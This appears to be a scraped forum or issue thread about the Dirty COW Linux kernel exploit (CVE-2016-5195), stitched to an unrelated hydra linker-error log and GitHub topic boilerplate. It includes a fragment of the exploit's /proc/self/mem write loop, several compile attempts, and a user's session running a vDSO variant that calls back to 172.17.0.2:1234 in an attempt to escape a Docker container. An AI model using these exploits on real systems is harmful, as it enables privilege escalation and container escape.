hydra.o:hydra.c:(.rdata+0x590): undefined reference to service_ldap2' hydra.o:hydra.c:(.rdata+0x598): undefined reference to usage_ldap'
hydra.o:hydra.c:(.rdata+0x5a8): undefined reference to service_ldap_init' hydra.o:hydra.c:(.rdata+0x5b0): undefined reference to service_ldap3'
hydra.o:hydra.c:(.rdata+0x5b8): undefined reference to usage_ldap' hydra.o:hydra.c:(.rdata+0x5c8): undefined reference to service_ldap_init'
hydra.o:hydra.c:(.rdata+0x5d0): undefined reference to service_ldap3_cram_md5' hydra.o:hydra.c:(.rdata+0x5d8): undefined reference to usage_ldap'
hydra.o:hydra.c:(.rdata+0x5e8): undefined reference to service_ldap_init' hydra.o:hydra.c:(.rdata+0x5f0): undefined reference to service_ldap3_digest_md5'
hydra.o:hydra.c:(.rdata+0x5f8): undefined reference to usage_ldap' hydra.o:hydra.c:(.rdata+0x608): undefined reference to service_mssql_init'
hydra.o:hydra.c:(.rdata+0x610): undefined reference to service_mssql' hydra.o:hydra.c:(.rdata+0x628): undefined reference to service_nntp_init'
hydra.o:hydra.c:(.rdata+0x630): undefined reference to service_nntp' hydra.o:hydra.c:(.rdata+0x638): undefined reference to usage_nntp'
hydra.o:hydra.c:(.rdata+0x648): undefined reference to service_pcanywhere_init' hydra.o:hydra.c:(.rdata+0x650): undefined reference to service_pcanywhere'
hydra.o:hydra.c:(.rdata+0x668): undefined reference to service_pcnfs_init' hydra.o:hydra.c:(.rdata+0x670): undefined reference to service_pcnfs'
hydra.o:hydra.c:(.rdata+0x688): undefined reference to service_pop3_init' hydra.o:hydra.c:(.rdata+0x690): undefined reference to service_pop3'
hydra.o:hydra.c:(.rdata+0x698): undefined reference to usage_pop3' hydra.o:hydra.c:(.rdata+0x6a8): undefined reference to service_redis_init'
hydra.o:hydra.c:(.rdata+0x6b0): undefined reference to service_redis' hydra.o:hydra.c:(.rdata+0x6c8): undefined reference to service_rexec_init'
hydra.o:hydra.c:(.rdata+0x6d0): undefined reference to service_rexec' hydra.o:hydra.c:(.rdata+0x6e8): undefined reference to service_rlogin_init'
hydra.o:hydra.c:(.rdata+0x6f0): undefined reference to service_rlogin' hydra.o:hydra.c:(.rdata+0x708): undefined reference to service_rsh_init'
hydra.o:hydra.c:(.rdata+0x710): undefined reference to service_rsh' hydra.o:hydra.c:(.rdata+0x728): undefined reference to service_rtsp_init'
hydra.o:hydra.c:(.rdata+0x730): undefined reference to service_rtsp' hydra.o:hydra.c:(.rdata+0x748): undefined reference to service_rpcap_init'
hydra.o:hydra.c:(.rdata+0x750): undefined reference to service_rpcap' hydra.o:hydra.c:(.rdata+0x768): undefined reference to service_s7_300_init'
hydra.o:hydra.c:(.rdata+0x770): undefined reference to service_s7_300' hydra.o:hydra.c:(.rdata+0x778): undefined reference to usage_s7_300'
hydra.o:hydra.c:(.rdata+0x788): undefined reference to service_smtp_init' hydra.o:hydra.c:(.rdata+0x790): undefined reference to service_smtp'
hydra.o:hydra.c:(.rdata+0x798): undefined reference to usage_smtp' hydra.o:hydra.c:(.rdata+0x7a8): undefined reference to service_smtp_enum_init'
hydra.o:hydra.c:(.rdata+0x7b0): undefined reference to service_smtp_enum' hydra.o:hydra.c:(.rdata+0x7b8): undefined reference to usage_smtp_enum'
hydra.o:hydra.c:(.rdata+0x7c8): undefined reference to service_snmp_init' hydra.o:hydra.c:(.rdata+0x7d0): undefined reference to service_snmp'
hydra.o:hydra.c:(.rdata+0x7d8): undefined reference to usage_snmp' hydra.o:hydra.c:(.rdata+0x7e8): undefined reference to service_socks5_init'
hydra.o:hydra.c:(.rdata+0x7f0): undefined reference to service_socks5' hydra.o:hydra.c:(.rdata+0x808): undefined reference to service_teamspeak_init'
hydra.o:hydra.c:(.rdata+0x810): undefined reference to service_teamspeak' hydra.o:hydra.c:(.rdata+0x828): undefined reference to service_telnet_init'
hydra.o:hydra.c:(.rdata+0x830): undefined reference to service_telnet' hydra.o:hydra.c:(.rdata+0x838): undefined reference to usage_telnet'
hydra.o:hydra.c:(.rdata+0x848): undefined reference to service_vmauthd_init' hydra.o:hydra.c:(.rdata+0x850): undefined reference to service_vmauthd'
hydra.o:hydra.c:(.rdata+0x868): undefined reference to service_vnc_init' hydra.o:hydra.c:(.rdata+0x870): undefined reference to service_vnc'
hydra.o:hydra.c:(.rdata+0x888): undefined reference to service_xmpp_init' hydra.o:hydra.c:(.rdata+0x898): undefined reference to usage_xmpp'
hydra.o:hydra.c:(.rdata$.refptr.do_retry[.refptr.do_retry]+0x0): undefined reference to do_retry' hydra.o:hydra.c:(.rdata$.refptr.colored_output[.refptr.colored_output]+0x0): undefined reference to colored_output'
hydra.o:hydra.c:(.rdata$.refptr.old_ssl[.refptr.old_ssl]+0x0): undefined reference to old_ssl' hydra.o:hydra.c:(.rdata$.refptr.quiet[.refptr.quiet]+0x0): undefined reference to quiet'
hydra.o:hydra.c:(.rdata$.refptr.selected_proxy[.refptr.selected_proxy]+0x0): undefined reference to selected_proxy' hydra.o:hydra.c:(.rdata$.refptr.found[.refptr.found]+0x0): undefined reference to found'
hydra.o:hydra.c:(.rdata$.refptr.proxy_string_port[.refptr.proxy_string_port]+0x0): undefined reference to proxy_string_port' hydra.o:hydra.c:(.rdata$.refptr.proxy_string_type[.refptr.proxy_string_type]+0x0): undefined reference to proxy_string_type'
hydra.o:hydra.c:(.rdata$.refptr.proxy_authentication[.refptr.proxy_authentication]+0x0): undefined reference to proxy_authentication' hydra.o:hydra.c:(.rdata$.refptr.proxy_string_ip[.refptr.proxy_string_ip]+0x0): undefined reference to proxy_string_ip'
hydra.o:hydra.c:(.rdata$.refptr.fe80[.refptr.fe80]+0x0): undefined reference to fe80' hydra.o:hydra.c:(.rdata$.refptr.use_proxy[.refptr.use_proxy]+0x0): undefined reference to use_proxy'
hydra.o:hydra.c:(.rdata$.refptr.proxy_count[.refptr.proxy_count]+0x0): undefined reference to proxy_count' hydra.o:hydra.c:(.rdata$.refptr.HYDRA_EXIT[.refptr.HYDRA_EXIT]+0x0): undefined reference to HYDRA_EXIT'
hydra.o:hydra.c:(.rdata$.refptr.cmdlinetarget[.refptr.cmdlinetarget]+0x0): undefined reference to cmdlinetarget' hydra.o:hydra.c:(.rdata$.refptr.port[.refptr.port]+0x0): undefined reference to port'
hydra.o:hydra.c:(.rdata$.refptr.waittime[.refptr.waittime]+0x0): undefined reference to waittime' hydra.o:hydra.c:(.rdata$.refptr.verbose[.refptr.verbose]+0x0): undefined reference to verbose'
hydra.o:hydra.c:(.rdata$.refptr.bf_options[.refptr.bf_options]+0x0): undefined reference to bf_options' hydra.o:hydra.c:(.rdata$.refptr.debug[.refptr.debug]+0x0): undefined reference to debug'
collect2: error: ld returned 1 exit status
Great site. Thanks. Hope it'd affect an attitude of some device-makers.
Made an app for Androd, but there's your ported code working hundreds times faster on Linux.
https://github.com/avs333/cve5195
YOU HAVE TO PATCH OR YOU'RE IN THE GEHENNA OTHERWISE
I am using my Debian image on a Orange Pi One board (armhf), the exploit compiles without a problem, but it doesnt work, here is a log:
https://gist.github.com/m00nd3ck/22d407914f150af4cdfa619057ce4fe3
The kernel i am using:
https://github.com/SvenKayser/Sambooca-Kernel-H3/tree/sun8i
Could it be that old kernels were not affected?
Edit: Fairly certain this isn't for Android and won't compile as such..
gcc -pthread dirtyc0w.c -o dirtyc0w
gcc -pthread -pie dirtyc0w.c -o dirtyc0w
gcc -pthread -fpie dirtyc0w.c -o dirtyc0w
gcc -pthread -pie -fpie dirtyc0w.c -o dirtyc0w
(not executable: 64-bit ELF file)
Unless you know I'm wrong I believe this is designed for a different OS.
Linux bright 4.6.2-1-ARCH #1 SMP PREEMPT Wed Jun 8 08:40:59 CEST 2016 x86_64 GNU/Linux
POC writes only 4 bytes of payload.
Also, it looks like
int f=open("/proc/self/mem",O_RDWR);
int i,c=0;
for(i=0;i<100000000;i++) {
lseek(f,map,SEEK_SET);
c+=write(f,str,10);
}
printf("procselfmem %d\n\n", c);
}
also ruining other internal processes, which are affected by this bug.
gcc 5.3.0, musl libc 1.1.14
dirtyc0w.c:95:3: error: invalid use of undefined type 'struct stat'
map=mmap(NULL,st.st_size,PROT_READ,MAP_PRIVATE,f,0);
^
Just trying to clarify a bit what happens, not very obvious for non GCC experts.
Are we forcing the dirty bit to be set on a COW and that's forcing the write?
What is the role of using /proc/self/mem to write into the mmaped region? Why can't we write to the region using some sprintf(ptr,...)?
Would it be possible to get either in the wiki or gist attached to this page, a list of distro's and the patched kernel version?
See https://twitter.com/solardiz/status/789923234275885056
OK, next challenge: exploit #DirtyCOW without MADV_DONTNEED. Can you? The race still there, just no(?) easy&efficient trigger.
we need places that manipulate ptes without write-locking mmap_sem, yes? Surely there are others.
Perhaps not every kind of manipulation will work. I'd be interested in a PoC.
mremap, munmap, msync, mprotect don't work as drop-in replacements.
I've heard that dirty cow is a regression: it was fixed in ~ 2005 but the fix was later reverted.
Can you confirm (with a link)?
Thanks!
In fact, all the boring normal bugs are way more important, just because there's a lot more of them. I don't think some spectacular security hole should be glorified or cared about as being any more "special" than a random spectacular crash due to bad locking.
This is... wrong. Really, horribly, terribly, dangerously wrong.
While I share no love for this new meme of cute sites and marketing names for security bugs, privilege escalation > denial of service, and that goes double at the kernel level. It's the difference between having your website defaced and having your customer data leaked or your machine joined to a botnet.
This is not equivalent to the other 5,000 bugs on CVE this year because:
Please consider treating this bug with the respect it deserves. Your site, as written, could lead someone to believe that it's a non issue.
I've been unable to find a source for the loop iteration - is it just empirical? Is there any evidence this number of iterations is enough? Different hardware / architecture? I guess:
Is there a version which tests whether the underlying file has been changed, perhaps reporting every 100000000 iterations? Just curious...
Thank you for your great project. I ran it successfully on my Ubuntu and I want to demo it on the class. While the ./dirtyc0w foo blablabla is really time consuming. Could you plz tell me how can I make it run faster?
Thank you
I'm trying to escape the container and get a root shell from host machine using https://github.com/gebl/dirtycow-docker-vdso (based on https://github.com/scumjr/dirtycow-vdso) to experiment the PoC. This actually compiles the binary inside the container. But while executing ends up with an error Segment fault.
root@7e6fad945815:/# cd dirtycow-vdso/
root@7e6fad945815:/dirtycow-vdso# make
nasm -f bin -o payload payload.s
xxd -i payload payload.h
cc -o 0xdeadbeef.o -c 0xdeadbeef.c -Wall
cc -o 0xdeadbeef 0xdeadbeef.o -lpthread
root@7e6fad945815:/dirtycow-vdso# ./0xdeadbeef 172.17.0.2:1234
[*] payload target: 172.17.0.2:1234
[*] exploit: patch 1/2
Segmentation fault
Host Machine Details: (VirtualBox 5.1.26 VM - Ubuntu 16.04.1)
Linux ubuntu-xenial 4.4.0-43-generic #63-Ubuntu SMP Wed Oct 12 13:48:03 UTC 2016 x86_64 x86_64 x86_64 GNU/Linux
Docker version 1.12.3, build 6b644ec
Container image Ubuntu 14.04.5 LTS
I have also tried compiling the binary in the host machine and copied inside the container as well as downloaded pre-compiled binary from the wild and tried to execute inside the container too. Also, I've tried Kernel versions 4.4.0-21, 4.4.0-31 on Ubuntu 16.04 server too. But all of them ends up with the same error message Segment fault. What am I doing wrong? Could someone please help in fixing this to escape the container and drop in host machine root shell?
React
A declarative, efficient, and flexible JavaScript library for building user interfaces.
🖖 Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
Typescript
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
Django
The Web framework for perfectionists with deadlines.
Laravel
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. 📊📈🎉
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
Facebook
We are working to build community through open source technology. NB: members must have two-factor auth.
Microsoft
Open source projects and samples from Microsoft.
Google
Google ❤️ Open Source for everyone.
Alibaba
Alibaba Open Source for everyone
D3
Data-Driven Documents codes.
Tencent
China tencent open source team.